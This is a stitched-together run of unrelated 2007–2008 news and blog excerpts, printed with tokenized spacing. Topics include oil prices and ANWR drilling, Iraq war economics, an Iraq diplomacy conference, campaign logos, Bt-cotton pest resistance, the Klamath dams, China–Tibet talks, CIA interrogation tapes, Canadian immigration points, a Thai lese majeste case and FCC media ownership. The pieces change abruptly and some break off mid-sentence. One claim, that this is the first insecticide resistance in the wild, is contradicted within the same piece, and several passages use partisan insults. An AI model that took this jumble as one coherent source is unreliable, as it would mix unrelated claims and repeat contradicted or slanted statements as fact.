CERA ’s prediction came the day after investment bank Goldman Sachs said oil prices could scale $ 200 a barrel in the next two years as part of an ongoing “ super spike ” in the market .
The combination of supply outages in Nigeria , sagging production in Venezuela and Iraq ’s inability to boost output has spurred a significant “ aggregate disruption ” of oil supply , Yergin said .
“ When you add it all up , it ’s an aggregate disruption that has taken a few million barrels per day out , ” he said .
“ People have underestimated the importance of Nigeria in particular . ”
Despite the end last week of a strike that halted Exxon Mobil XOM .N output in the West African country , traders remain concerned about supply disruptions in Nigeria .
Advertisements
With energy prices being at an all time high , Republicans have returned to arguing that the key to energy independence is drilling for more oil .
I am here to tell you why this view is not only wrong , but also incredibly stupid .
Here are the basic numbers from the U.S. government ’s own Energy Information Administration .
America uses 20.68 million barrels of oil a day , of which the United States produces 5 million barrels a day .
It imports 5 million barrels a day from OPEC , and another 1.8 million barrels a day from Canada .
The rest comes from other sources .
According to Republicans , if we produce more oil , then we are energy independent , problem solved , right ?
Wrong , because we do n’t have enough oil fields left to explore to feed our habit for the long term .
Republicans always want to drill in Alaskan National Wildlife Refuge ( ANWR ) , but according to the U.S. Geological Survey there are only 4.3 - 11.8 billion barrels of oil there .
At our current consumption rate this translates to 7 months or at max about 14 months worth of oil .
Advertisements
What about coastal oil drilling ?
Chevron ’s discovery of a big oil field off the Gulf Coast is estimated to contain 3 - 15 billion barrels of oil .
If this oil was only sold in America , which it wo n’t be , the oil may be drilled in America , but it belongs to the oil companies , and goes on the global market , it would last 5 - 19 months here in America .
The people who argue for more drilling seem to forget that the oil does n’t belong to the United States .
If the oil companies drill it , they own it , so oil drilled in ANWR could easily end up in China or India .
The drill for more oil argument reminds of the gas tax holiday issue .
These are n’t real solutions .
They are temporary Band - Aids at best .
The only group that stands to benefit from increased exploration is the oil companies .
The only real solutions to this problem involve cutting consumption and developing alternative fuels .
If solving the nation ’s energy problem was as simple as drilling for more oil , do n’t you think that this would have been done already ?
Despite what many want to believe , oil is not an infinite resource .
Pretending like we can just go get more is a moronic non-answer to one of the most significant issues of our time .
USGS ANWR Estimate :
http://www.usgs.gov/newsroom/article.asp?ID=1126
EIA Stats :
http://www.eia.doe.gov/neic/quickfacts/quickoil.html
This story is copyright 1974 by Ursula K. Le Guin .
It is transcribed from Le Guin 's collection The Compass Rose because I 'd like my friends to read it ( context ) .
The Author of the Acacia Seeds
And Other Extracts from the Journal of the Association of Therolinguistics
This story has been removed in response to a request from the literary agency representing Ursula K. Le Guin .
I urge you to purchase or borrow a book containing this short story .
-- Matt , April 2018
Are wars good for the economy ?
America ’s War -Torn Economy , by Joseph E. Stiglitz , Project Syndicate : ... It used to be thought that wars were good for the economy .
After all , World War II is widely thought to have helped lift the global economy out of the Great Depression .
But , at least since Keynes , we know how to stimulate the economy more effectively , and in ways that increase long - term productivity and enhance living standards .
This war , in particular , has not been good for the economy , for three reasons .
First , it has contributed to rising oil prices .
...
Higher oil prices mean that Americans ( and Europeans and Japanese ) are paying hundreds of millions of dollars to Middle East oil dictators and oil exporters elsewhere in the world rather than spending it at home .
Moreover , money spent on the Iraq war does not stimulate the economy today as much as money spent at home on roads , hospitals , or schools , and it does n’t contribute as much to long - term growth .
Economists talk about “ bang for the buck ” – how much economic stimulus is provided by each dollar of spending .
It ’s hard to imagine less bang than from bucks spent on a Nepalese contractor working in Iraq .
With so many dollars going abroad , the American economy should have been in a much weaker shape than it appeared .
But , much as the Bush administration tried to hide the true costs of the war by incomplete and misleading accounting , the economy ’s flaws were covered up by a flood of liquidity from the Federal Reserve and by lax financial regulation .
...
In a sense , the strategy worked : a housing bubble fed a consumption boom , as savings rates plummeted to zero .
The economic weaknesses were simply being postponed to some future date ; the Bush administration hoped that the day of reckoning would come after November 2008 .
Instead , things began to unravel in August 2007 .
Now it has responded , with a stimulus package that is too little , too late , and badly designed .
...
With home prices falling ( and set to continue to fall ) , and with banks uncertain of their financial position , lenders will not lend and households will not borrow .
So , while the additional liquidity injected into the financial system by the Fed may have prevented a meltdown , it wo n’t stimulate much consumption or investment .
Instead , much of it will find its way abroad .
China , for example , is worried that the Fed ’s stimulus will increase its domestic inflation .
There is a third reason that this war is economically bad for America .
Not only has America already spent a great deal on this war – $ 12 billion a month , and counting – but much of the bill remains to be paid , such as compensation and health care for the 40 % of veterans who are returning with disabilities , many of which are very serious .
Moreover , this war has been funded differently from any other war in America ’s history ...
Normally , countries ask for shared sacrifice , as they ask their young men and women to risk their lives .
Taxes are raised .
There is a discussion of how much of the burden to pass on to future generations .
In this war , there was no such discussion .
When America went to war , there was a deficit .
Yet remarkably , Bush asked for , and got , a reckless tax cut for the rich .
That means that every dollar of war spending has in effect been borrowed .
For the first time since the Revolutionary War , two centuries ago , America has had to turn to foreigners for financing , because US households have been saving nothing .
The numbers are hard to believe .
The national debt has increased by 50 % in eight years , with almost $ 1 trillion of this increase due to the war – an amount likely to more than double within ten years .
Who would have believed that one administration could do so much damage so quickly ?
America , and the world , will be paying to repair it for decades to come .
Recall that an increase in government spending can be paid for in one of three ways , we can raise taxes , we can borrow the money , or we can print the money needed to finance the spending .
( In a given year , the government budget constraint is Government spending +
Interest on debt - Taxes = Change in money supply plus Change in bond supply ) .
This administration did n't raise taxes to pay for the war - taxes were lowered - so that means that changes in the money supply and changes in borrowing needed to make up the $ 1 trillion spent on the war plus the hundreds of billions of revenue lost due to the tax cuts .
Normally , an increase in borrowing ( government debt ) has two costs , First , it raises interest rates because the government competes with private investors and other governments for available funds , and that increases the price of borrowing .
The increase in interest rates causes investment to be lower , that in turn lowers growth , and that means output will be lower in future time periods .
In effect , output has been shifted from the future to the present through borrowing .
Second , the interest payments themselves are a cost to the US if they are made to people living outside the US ( payments made within the US redistribute income , but they are not a net cost to US citizens ) .
Since recent borrowing was from foreigners , all the interest paid on the debt will flow out of the US and represent a cost to US citizens .
One of these costs , interest payments flowing outside of the US , has occurred and will continue to occur , but the other , an increase in interest rates brought about by competition from the government for saving has not .
Why ?
One reason is the " savings glut " in the world that allowed us to borrow money from the foreign sector without pushing up interest rates .
But a second reason is Federal Reserve interest rate targeting .
With a constant interest rate target , deficit spending that puts upward pressure on interest rates is automatically " monetized , " i.e. the Fed buys up the debt and replaces it with money to keep the interest rate on target , and the increase in the money supply holds down interest rates .
But there is a cost here too , by increasing the money supply to hold down interest rates , inflation pressure is created , and inflation acts as a hidden tax by lowering the value of money .
I think the spending on the war and low - interest rates that have been brought about by Fed policy and the savings glut have helped to keep our economy from sputtering , but it has not been costless .
First , as noted above , spending on the war may have some had stimulative effect , but if that is the goal , there are much better ways to do this .
So , relative to spending the money domestically on , say , infrastructure , we have not gotten as much for our money as we might have otherwise .
Second , increases in the money supply and the influx of funds from foreigners to finance debt kept interest rates low and financed a housing bubble , but the result was a misallocation of resources to the housing sector .
We stimulated the economy with low interest rates and a housing bubble , but we built things that did n't need to be built and are now sitting idle wasting resources .
That is a cost to the economy , and we'd be better off now if some of that spending had been in other sectors .
Third , the interest costs .
As noted above , we have borrowed from foreigners to pay for the war , so the interest on the debt will be a net drain to the US economy .
Fourth , inflation .
Keeping interest rates low is inflationary , and inflation imposes a cost .
I 'm not sure how much of the $ 1 trillion has been financed by printing money , but to the extent that it has been financed in this way , the consequence is potentially higher inflation in the future .
Fifth , the increase in the price of oil as detailed above .
There are also the human costs , and the costs to the Iraqis , which are not included in these figures .
Because we have paid for the war by borrowing and printing money , and because of delays in the appearance of many of the costs associated with the war , e.g. the cost of paying for permanently disabled soldiers will come largely in the future , inflation only appears with a long lag , interest payment to foreigners will be ongoing , etc. , many of the costs are not evident yet .
But the costs are there and they will need to be paid .
Are there any costs that I 've overlooked , misstated , or forgotten ?
Egypt will hold a high - level international conference next month to discuss ways to stabilize Iraq and prevent the spread of sectarian violence to its neighbors , Iraq ’s foreign minister said Saturday .
The meeting will provide a rare opportunity for U.S. officials to sit at the same table with counterparts from Iran and Syria .
Tensions with those countries have skyrocketed in the wake of accusations by Washington that they are providing key support to militants fighting U.S. soldiers in Iraq .
Iraqi Foreign Minister Hoshyar Zebari said he hoped the gathering would help thaw relations .
“ We expect there will be chances to hold bilateral dialogues , ” he said at a news briefing here .
But he conceded that “ there is some work ahead of us to ensure the participation of all the countries in this meeting and to encourage all to participate constructively . ”
Advertisement
U.S. Secretary of State Condoleezza
Rice has indicated she will attend and has not ruled out direct talks with her Iranian counterparts .
The announcement about attempts to ease sectarian divisions came on a day when at least 44 bodies were found , including 19 caught in a net stretched under a bridge in Baqubah to collect trash , officials said .
It was not immediately clear how old the corpses were .
When temperatures rise in the spring , discarded bodies frequently float to the surface of rivers coursing through some of Iraq ’s most volatile regions .
Fighting in Diwaniya
Sporadic fighting was reported Saturday in Diwaniya , south of Baghdad , where U.S. and Iraqi forces are pursuing followers of radical Shiite cleric Muqtada Sadr after they fled a security crackdown in Baghdad .
Advertisement
U.S. warplanes fired at Shiite militiamen armed with shoulder - fired rocket - propelled grenades , the military said .
Iraqi and coalition forces swept into the city before dawn Friday in a bid to restore control to the government .
At least nine people have been killed and 21 injured since Friday , said Hameed Jaati , the provincial health director .
The U.S. military confirmed it had killed four gunmen and detained 39 others .
Several weapons caches were also found , the military said .
During the operation , a coalition vehicle hit a roadside bomb , the military said .
Three soldiers were slightly wounded ; the military did not specify their nationality .
At least two Iraqi soldiers were also reported injured in the fighting .
Coalition and Iraqi forces sealed off neighborhoods believed to be strongholds of Sadr ’s Al Mahdi militia , and helicopters buzzed overhead , said residents , who were confined to their homes by a round - the - clock curfew .
Advertisement
The U.S. military also reported the deaths of two U.S. soldiers Saturday .
One was killed and four injured when an armor- piercing bomb exploded in an eastern section of the capital Friday , the military said .
Another soldier was killed and three wounded in a roadside bombing Friday in west Baghdad , the military said .
At least 3,271 U.S. personnel have been killed in Iraq since the start of the war in 2003 , according to the website icasualties.org .
The effort to curb the violence is a daunting task .
Last month , a preparatory session in Baghdad ended with no agreement on when or where foreign ministers from neighboring countries and elsewhere would meet to try to stem the bloodshed .
Iraq had hoped to host the main conference , but other countries balked -- especially when mortar rounds slammed into the street outside during their initial gathering .
Less than two weeks later , an exploding rocket narrowly missed a building in the heavily protected Green Zone where U.N. Secretary - General Ban Ki-moon was appearing on live television with Iraqi Prime Minister Nouri Maliki , startling the United Nations chief on his first official visit to Iraq .
Zebari acknowledged the dangers facing high - profile ministerial delegations and said the government decided to consider alternative venues .
Advertisement
“ If we had insisted on Baghdad , then maybe we would have had fewer delegation representatives , and the meeting would not have been as useful , ” he said .
“ Our aim is to have a successful meeting . ”
Egypt , Turkey and Kuwait offered to step in as hosts , he said .
After considerable negotiations , it was decided to hold the meeting at the Egyptian Red Sea resort of Sharm el Sheik on May 3 - 4 , he said .
Representatives of 21 countries and organizations , including the five permanent members of the U.N. Security Council and the Group of 8 industrialized nations , are invited , Zebari said .
‘ There is new will ’
Advertisement
The first meeting did little to untangle the complicated resentments and suspicions between Iraq ’s Shiite - led government and its mostly Sunni Arab neighbors .
But Zebari was optimistic that next month ’s gathering would be more effective .
“ There is new will and a deeper appreciation of the danger of the situation , ” he said .
“ Everyone will be under the spotlight to show how committed they are to the promises they have made . ”
The bloodshed shows no signs of easing .
Northeast of Baghdad , 28 bodies were found in and around the city of Baqubah .
Nine were discovered on a farm in a mostly Sunni area just north of the city , and the rest were caught in the net under Baqubah Bridge , police said .
Most had been shot execution - style .
Police in Baghdad recovered 14 more bodies in the 24 hours ending Saturday night , some cuffed and blindfolded .
Two more were found in a volatile region south of the capital .
The grim toll is considered a measure of sectarian violence .
Advertisement
zavis@latimes.com
Times staff writers Said Rifai and Raheem Salman in Baghdad and special correspondent Ruaa Al - Zarary in Mosul contributed to this report , along with special correspondents in Baghdad , Basra and Hillah .
Manufacturers Struggle to Compete China's Factory Blues
Rising costs and regulation have led to shutdowns and restructurings in China like those that tore through America 's heartland .
Von Dexter Roberts
It ’s amazing how designers have to treat one and the same theme in so many variations .
Some of the schemes are repeating themselves , but as a general – there ’s a big variety that might be useful for every logo and corporate designer .
As we can see – there are certain trends last years – like the usage of curves , reminding of the USA flag .
They start using this curves better and better .
Angles and length are different , much more attractive last years .
Also almost the complete lack of photos – in compare of the campaigns during the 60’s .
Pay extra attention to the different variations of blue .
Some are more warm , some – more cold and strict .
The usage of an extra color except the red and the blue is very rare and it ’s primary yellow , green , black and orange .
Once in 1972 , Muskie uses as a background color dark purple .
In some of the cases bellow “ brown ” appears , referring to the colored americans , I believe .
The “ Obama ” designs are definite one level higher .
In 1988 there are 10 banners / logos that bet on the white color .
In 2008 they are barely 3 .
As we can see the patterns , I predict that on the next elections white will be on the stage again .
Most popular symbols are : flag , star , eagle and the number of the year of the elections .
Though there are brave usages of cowboy hat , street sign and heart - shaped key .
And , yes , let ’s do n’t forget the signature of Mr. Hatch in year 2000 .
May be more signatures will appear in future , who knows , as long as creative logos and shapes like those of Mr. Obama .
The source of all these logos is 4 president.us .
Visit the website to see more political design materials .
To read more , check out the following links :
www.logoblog.org/wordpress/us-political-campaign-logos/
www.37signals.com/svn/posts/522-presidential-candidate-logos-politics-as-usual
www.aiga.org/content.cfm/the-dreary-art-of-presidential-elections
www.kolbrenerusa.com/blog/index.php/2007/08/08/campaign-logos-2008
...
Read More ...
Now , kiddies do not play as far as they have to .
They 're surprised by the entire digital age happening , and most of their leisure time will be used on I pads , I
Click to view
For years , farmers have been growing genetically - engineered cotton plants that exude an insecticide known as Bt .
But now , a pest called the bollworm moth has evolved a resistance to Bt — and the altered bugs have already spread across part of the southern United States .
This is the first - known example of bugs evolving resistance to an insecticide in the wild .
It proves that natural selection can outrun genetic engineering in terms of its ability to transform a species quickly .
Advertisement
University of Arizona researcher Bruce Tabashnik said :
What we 're seeing is evolution in action .
This is the first documented case of field - evolved resistance to a Bt crop .
Advertisement
According to a University of Arizona release :
The researchers write in their report that Bt cotton and Bt corn have been grown on more than 162 million hectares ( 400 million acres ) worldwide since 1996 , " generating one of the largest selections for insect resistance ever known . "
Tabashnik and his colleagues hasten to add that most bollworms have not become resistant , and that resistance has been known to happen in pest populations exposed to Bt spray .
But this is the first time any creature has evolved a resistance to genetically - engineered crops containing Bt .
Another example of natural selection working this fast can be seen among elephants , who were hunted for their ivory tusks in the ninteenth and twentieth centuries .
Over the course of a century , a " tuskless " mutation in a few elephants spread across the population like wildfire .
While only 1 % of elephants were born without tusks in 1930 , in 1998 15 % of female and 9 % of male elephants were .
Image via USDA - Agricultural Research Service .
Advertisement
First documented case of pest resistence to biotech cotton [ Eurekalert ]
I really have no words , except this is why they ’re called wingnuts .
According to Pat Robertson , God is using superhighway I -35 that runs from Canada to Mexico through the midwest to purify America from sin .
He says “ I - 35 is the highway spoken of in Isaiah 35:8 – “ And a highway will be there ; it will be called the way of holiness . ”
So , evangelical Christians have set aside 35 days to use the cities around I - 35 to rid America of sin , meaning “ abortion clinics , gay bars , strip joints , and porn shops . ”
God is using “ purity sieges ” to set America free .
And they ’re apparently working – homosexuals , like James Stabile , a drunk gay who stumbled across a purity siege , was cured when a pastor touched him and yelled “ Fire ! ”
Stabile : “ I did n’t feel the desires to be with men like I felt before . ”
Shazam !
Is God Using NAFTA Superhighway to Stop Homosexuality ? [ rightwingwatch ]
( via wonkette )
The four dams on the Klamath River in far Northern California are under relicensing , something that only occurs every 50 years .
The dams are owned by billionaire Warren Buffett , who purchased Pacificorp , one of the lowest - cost electricity producers in the United States , three years ago .
Many Californians were hopeful this purchase would mean the end to the dams , but their concerns for the salmon fell on deaf ears .
Once again , Warren Buffett rebuffed salmon advocates .
On Saturday , May 3 , 2008 , American Indian tribes and salmon fisherman failed to gain a private audience with Buffett and were ignored at the Berkshire Hathaway Inc. meeting in Omaha , Nebraska .
Protesters shouted , “ Un - dam the Klamath !
Bring the salmon home ! “ , while shareholders enjoyed complimentary cocktails Friday night .
For two years , an unprecedented alliance of tribes , businesses , conservation groups and commercial / recreational fishermen has tried to reach an agreement with Buffett for dam removal .
Buffett said that his company would not decide the fate of the Klamath dams , but Berkshire will defer to regulators in California and Oregon .
Ironically , dam removal is cheaper than building the fish ladders regulators are recommending .
Salmon fishing has been canceled this year and declared a “ disaster ” in California and Oregon , largely because of the Sacramento River ; however , the previous fisheries disaster was due to the Klamath salmon population .
This year ’s closure amounts to a loss of $ 255 million and 2,263 jobs to California coastal communities .
Just as hard hit , or even harder hit , are the Native Americans in the region , many who traveled to Omaha in protest of the Klamath dams .
“ It ’s the fight for the salmon , and it ’s the fight for our species , ” said Yurok member Frankie Myers .
The salmon have not had full access to the Klamath River since the first dam was built in 1916 .
Related posts on the Klamath River and Salmon :
Why the Klamath Dams Do n’t Provide “ Green ” Energy
Sobering News for This Fish Lover
NYIMU COUNTY , China ( Reuters ) - China is to hold talks with envoys of the Dalai Lama , the spiritual leader of Tibetan Buddhism whom it blames for a wave of unrest , state media reported on Friday , as the Olympic flame arrived in Japan .
The move comes after concerted pressure from the West on China to talk to the Dalai Lama and marks the first serious step to defuse tensions aside from coming down hard on protesters and lambasting Tibetans ’ spiritual leader .
Beijing has stepped up its vilification of the Dalai Lama since anti-government protests hit Tibet and rippled across ethnic Tibetan parts of China in the past weeks .
“ In view of the requests repeatedly made by the Dalai side for resuming talks , the relevant department of the central government will have contact and consultation with the Dalai ’s private representative in the coming days , ” the official Xinhua news agency quoted an unnamed official as saying .
An envoy to the Dalai Lama said on Friday he had received notice of China ’s offer to hold talks with representatives of the Dalai Lama .
“ We have been told verbally , through private channels , that a meeting has been proposed , ” Dalai Lama envoy Kelsang Gyaltsen told Germany ’s Deutsche Welle broadcaster .
“ We neither know the date , the location , nor the topics that must be addressed at the meeting , ” he added , speaking in German .
Washington welcomed the announcement of talks .
“ We would certainly encourage both sides to follow up and to pursue this kind of dialogue and really use it as an opportunity to try to address some of the real issues that are there , ” said State Department spokesman Sean McCormack .
China denounces the Dalai Lama , who fled Tibet after a failed 1959 uprising against Communist rule , as a traitor and has accused him of orchestrating the unrest , a charge the 72 - year - old Nobel laureate denies .
But Tibet has become a flashpoint for anti-China protests that have disrupted the Olympic torch relay around the world and has led to calls for state leaders to boycott the Beijing Games , which open on August 8 .
“ It is hoped that through contact and consultation , the Dalai side will take credible moves to stop activities aimed at splitting China , stop plotting and inciting violence and stop disrupting and sabotaging the Beijing Olympic Games so as to create conditions for talks , ” the official was quoted as saying .
OFFICIAL DENUNCIATIONS
The Dalai Lama says he is seeking meaningful autonomy for the strategic Himalayan border region , but China denounces that as a sham and says he is bent on splitting the country .
Recent official denunciations of the Tibetan leader had usually referred to the Dalai “ clique ” , rather than Dalai “ side ” .
The United States and France have urged Beijing to hold talks with the Dalai Lama , while British Prime Minister Gordon Brown has said he would meet the Tibetan leader when he visits Britain in May .
“ This is a major step .
This renewed dialogue carries real hope , ” French President Nicolas Sarkozy ’s office said in a statement referring to the announcement of talks .
The Dalai Lama at the University of Michigan in Ann Arbor , Michigan April 21 , 2008 .
REUTERS / Rebecca Cook
The European Commission also voiced support as did the European Union .
“ As far as I understand the Chinese position , the Chinese say they are ready to discuss everything except sovereignty for Tibet , ” EC President Jose Manuel Barroso said in Beijing .
But a spokesman for the Dalai Lama said meeting Chinese officials was n’t sufficient .
“ The fact that the Chinese are now saying they want to meet us is n’t enough .
We ’ve got to talk about the problems .
Everything else is n’t going to help us , ” said spokesman Tenzin Taklha , quoted in an interview to appear on Saturday in Germany ’s Sueddeutsche Zeitung newspaper .
Reporters were allowed into Tibet on Friday and there was a heavy troop presence lining the road between the capital Lhasa and Shigatse , the second largest city in Tibet .
Japan called for calm but braced for trouble with tight security , as low - key protests began ahead of its leg of the torch relay that begins on Saturday in the central city of Nagano , following emotional scenes at other venues .
Nagano police arrested a man carrying a knife near the site of the relay start , Japanese media said on Friday .
The man claimed to be a monk and was carrying a document protesting the torch relay , Jiji and Kyodo news agencies said .
The flame is meant to transmit a message of peace and friendship , but its journey has been largely turned into a political event and the torch has been granted the sort of security usually reserved for state leaders .
POMP AND CEREMONY
In Hanoi , Vietnam state - run radio reported that a U.S. citizen of Vietnamese origin had been expelled on accusations of planning anti-Chinese protests at next week ’s Olympics torch relay in Ho Chi Minh City .
Reclusive North Korea , for its part , vowed to “ astonish the world ” with pomp , ceremony and safety during its stage of the relay on Monday , Chinese state media reported .
The Olympic torch is supposed to enter Tibet in early May to ascend Mt Everest and is to travel to its capital Lhasa on June 19 , legs China has vowed to see through , despite the tensions .
Before the protests soured relations , China and envoys of the Dalai Lama had been engaged in a tentative dialogue process , though several rounds since 2002 had yielded little progress .
( Writing by Lindsay Beck and Ben Blanchard ; Additional reporting by Chris Buckley in Beijing and bureau in Tokyo , Paris , Berlin and Washington ; Editing by Nick Macfie and David Fogarty )
WASHINGTON 
At the time that the Central Intelligence Agency destroyed videotapes of the interrogations of operatives of Al Qaeda , a federal judge was still seeking information from Bush administration lawyers about the interrogation of one of those operatives , Abu Zubaydah , according to court documents made public on Wednesday .
The court documents , filed in the case of Zacarias Moussaoui , appear to contradict a statement last December by Gen. Michael V. Hayden , the C.I.A. director , that when the tapes were destroyed in November 2005 they had no relevance to any court proceeding , including Mr. Moussaoui ’s criminal trial .
It was already known that the judge in the case , Leonie M. Brinkema , had not been told about the existence or destruction of the videos .
But the newly disclosed court documents , which had been classified as secret , showed the judge had still been actively seeking information about Mr. Zubaydah ’s interrogation as late as Nov. 29 , 2005 .
The destruction of the tapes is under investigation by the Justice Department and Congress .
One of the documents , a motion filed by Mr. Moussaoui ’s lawyers to the United States Court of Appeals for the Fourth Circuit , cites several instances in 2005 , including one after the videotapes were apparently destroyed , when government lawyers produced documents to the court that came from the interrogation of Abu Zubaydah .
We use selection factor points to help assess your eligibility for the Federal Skilled Worker Program .
We ’ll assess your selection factors and assign an overall score out of 100 .
If you score 67 points or higher , you may qualify for the Federal Skilled Worker Program .
If you meet the other requirements too , you can submit a profile to the Express Entry pool .
Once you ’re in the Express Entry pool , we use a different system to rank your profile .
If you score lower than 67 points , you wo n’t qualify for the program .
You may be able to get a higher score by doing things like : improving your language skills
completing another degree , diploma , or certificate
receiving an offer of arranged employment in Canada
On this page Language skills points
Education points
Work experience points
Age points
Arranged employment in Canada points
Adaptability points
Language skills ( maximum 28 points )
It ’s very important to be able to communicate in 1 or both of Canada ’s official languages .
Knowing English , French or both helps you in the Canadian job market .
You can get up to 28 points for your language skills in English and French .
We ’ll give you points based on your ability to : write
read
listen
speak Language testing
You must take an approved language test to prove your language levels .
To measure your English or French levels , we use : Canadian Language Benchmarks ( CLB ) for English
Niveaux de compétence linguistique canadiens ( NCLC ) for French
You must get a minimum level of CLB 7 or NCLC 7 for 1 official language in all 4 language areas .
To get points for the second official language , you must meet the minimum level of CLB 5 or NCLC 5 in all 4 language areas .
Once you take the language test , you can use it to see exactly how many points we ’ll give you for the language selection factor .
Find out more about language testing and how to get tested .
Calculate your language points
First official language ( maximum 24 points )
Check the table below and add the points that match your skill level :
Points First official language Speaking Listening Reading Writing CLB level 9 or higher 6 6 6 6 CLB level 8 5 5 5 5 CLB level 7 4 4 4 4 Below CLB level 7
Not eligible to apply Not eligible to apply Not eligible to apply Not eligible to apply
Second official language ( maximum 4 points )
You can get 4 points only if you have a score of at least CLB 5 in each of the 4 language abilities .
Second official language Points
At least CLB 5 in all of the 4 abilities 4 CLB 4 or less in any of the 4 abilities 0
Education ( maximum 25 points )
If you went to school in Canada , you must have a certificate , diploma or degree from a Canadian : secondary institution ( high school ) or
post - secondary institution
If you have foreign education , you must have : an Educational Credential Assessment ( ECA ) report for immigration purposes from a designated organization showing that your education is equal to a completed certificate , diploma or degree from a Canadian : secondary institution ( high school ) or post - secondary institution
from a designated organization showing that your education is equal to a completed certificate , diploma or degree from a Canadian :
You must include your Canadian credential or your foreign credential and Educational Credential Assessment report when you apply .
How to read your report and calculate your points for education Work experience ( maximum 15 points )
You can get points for the number of years you ’ve spent doing full - time paid work ( at least 30 hours per week , or an equal amount of part - time [ 15 hours per week for 24 months ] ) at skill type 0 , or skill levels A or B of the 2016 National Occupational Classification .
To get selection factor points , your work experience will count if it was : in Canada or abroad
while you were studying
while being self - employed Finding your National Occupational Classification ( NOC )
The NOC is a list of all the occupations in the Canadian labour market and is used to classify jobs in the Canadian economy .
It describes duties , skills , talents and work settings for different jobs .
You will need to identify the “ NOC code ” for each job that you want to include in your Express Entry profile .
Find your NOC to find the information that best matches each of your past jobs .
You ’ll need this information again , so make sure to save it .
If the description and list of main duties match what you did at your job (s ) , you can count this experience for points .
Use this chart to find the number of points based on your number of years of experience .
Experience Maximum 15 points 1 year 9 2 - 3 years 11 4 - 5 years 13 6 or more years 15
Age ( maximum 12 points )
You ’ll get points based on your age on the day we get your application .
Age Points Under 18 0 18-35 12 36 11 37 10 38 9 39 8 40 7 41 6 42 5 43 4 44 3 45 2 46 1 47 and older 0
Arranged employment in Canada ( maximum 10 points )
You can get points if you have a job offer of at least 1 year from a Canadian employer .
You must get the job offer before you apply to come to Canada as a Federal Skilled Worker .
A valid job offer has to be : for continuous , paid , full - time work ( minimum of 30 hours / week ) that is : not seasonal for at least 1 year
in an occupation listed as Skill Type 0 or Skill Level A or B of the NOC .
We must be convinced that : you ’re able to do the job offered to you
you ’ll be able to become licensed or certified when in Canada ( if the occupation is regulated in Canada )
To get 10 points for a valid job offer , 1 of these situations must also apply .
Situation 1
You currently work in Canada on a work permit and you meet all of the following conditions :
Your work permit is valid both when you apply and when the permanent resident visa is issued ( or you ’re allowed to work in Canada without a work permit when your visa is issued ) .
We issued your work permit based on a positive Labour Market Impact Assessment ( LMIA ) from Employment and Social Development Canada in an occupation listed under skill type 0 or skill level A or B of the NOC .
You ’re working for an employer named on your work permit .
That employer has made a valid job offer based on you being accepted as a skilled worker .
Situation 2
You currently work in Canada in a job that is exempt from the LMIA requirement because of 1 of the following : an international agreement ( such as , the North American Free Trade Agreement ) or
significant benefit to Canadian interests or
a federal - provincial agreement
You must also meet all of the following conditions :
Your work permit is valid both when you apply and when the permanent resident visa is issued ( or you ’re allowed to work in Canada without a permit when your permanent resident visa is issued ) .
Your current employer has made a valid job offer based on you being accepted as a skilled worker .
You are currently working for the employer specified on your work permit .
You have been working for that employer for at least 1 year , continuous full - time or part - time equivalent .
Situation 3
You must meet all of the following conditions :
You currently do n’t have a work permit , or do n’t plan to work in Canada before you get a permanent resident visa .
An employer has a LMIA .
That employer has made you a valid job offer based on that LMIA and on you being accepted as a skilled worker .
Situation 4
You must meet all of the following conditions :
You have a valid work permit or are allowed to work in Canada without a work permit .
You ’re currently working in Canada in a job that is exempt from a LMIA , but it is not under an international , federal - provincial agreement or because of significant benefit to Canadian interests .
under an international , federal - provincial agreement or because of significant benefit to Canadian interests .
An employer other than the one you are currently working for : has a LMIA has made you a valid job offer based on that LMIA and on you being accepted as a skilled worker .
LMIAs and valid job offers
You ca n’t get a LMIA ( your employer must do this for you ) .
ca n’t get a LMIA ( your employer must do this for you ) .
Employment and Social Development Canada will only confirm valid job offers for occupations listed in skill type 0 , or skill level A or B , of the NOC .
Adaptability ( maximum 10 points )
You and your spouse or common - law partner who will immigrate with you to Canada can earn points for adaptability .
You and your spouse can earn a maximum of 10 points by combining any of the elements below .
These elements assess how well you and your spouse are likely to settle in Canada .
Last updated at 13:26 22 April 2008
A Thai man who refused to stand during the royal anthem before a movie last year could face 15 years in jail after being charged with insulting the monarchy .
" Not standing is no crime , " Chotisak Onsoong , 27 , told reporters outside the Bangkok police station to which he had been summoned to appear .
" I would like to stress that what I did was not intended to insult or express vengeance to the king , " he added , saying he was simply expressing his right to freedom of expression .
Scroll down for more ...
King Bhumibol Adulyadej : Many
Thais regard him as semi-divine
A song and video espousing the virtues of King Bhumibol Adulyadej , whom many Thais regard as semi-divine , is played before every movie - screening .
Cinema - goers are told to stand for the anthem .
However , Chotisak 's decision to remain seated - only a year after an overtly royalist military coup - caused a stir in the cinema , with several movie - goers showering him with abuse , popcorn and bottles of water .
One man was so incensed he ended up scuffling with Chotisak in the aisle before the pair were separated by police .
The man subsequently filed a complaint against Chotisak , a prominent campaigner against the September 2006 coup .
Thailand 's lese majeste laws are among the toughest in the world , but are open to abuse since a complaint can be filed by anybody .
They were a regular feature of the charged political atmosphere that preceded the coup , although cases rarely advanced as far as the formal laying of charges .
The only case that did go the distance was that of a 57 - year - old Swiss man who received ten years in jail in March 2007 for daubing six pictures of Bhumibol with black paint during a drunken rampage on the monarch 's birthday .
Bhumibol , 80 , who has said he is not above criticism , pardoned Oliver Rudolf Jufer but not before he had spent four months in jail .
Jufer , a long - term resident of Thailand , was deported .
As America prepares for the year of intense democracy that is a presidential election , the question of how and what information reaches the public is crucial .
So when the Federal Communications Commission last month proposed to loosen restrictions on media ownership , the reaction was deeply divided .
FCC Chair Kevin Martin said the new rules , which would lift a 32 - year ban on cross - ownership , would improve news coverage and help the struggling newspaper industry , which he called the " watchdog and informer of the citizenry . "
But what happens when fewer companies are responsible for the watching and informing ?
The new rules , which allow companies to own a newspaper and a radio station in the 20 largest cities , follow a decade of haggling over how many media outlets one company can control in a single market .
Supporters say the modifications are long overdue .
Opponents argue that easing the ban will lead to more consolidation , stifling local news and limiting voices in the public sphere .
They fear that a handful of media moguls , such as Rupert Murdoch of News Corp. , which owns Fox Broadcasting , the New York Post , and the Wall Street Journal , will further extend their reach .
" If you consider information to be an important underpinning of a democracy and you do anything that skews the providing of information , then it is scary , " says Sandra Davidson , associate professor of media law at the Missouri School of Journalism .
Press baron .
Tensions over media ownership have deepened amid rapid changes in how people get their news .
Since 1975 , when the FCC instituted the ban to promote economic competition and diversity of views , the country has seen an explosion of outlets , including cable television , satellite radio , and the Internet .
But the proliferation of outlets has not been accompanied by an increase in the number of journalists .
Says Tom Goldstein , director of mass communications at the University of California - Berkeley : " Resources are in the distribution rather than the collection of news . "
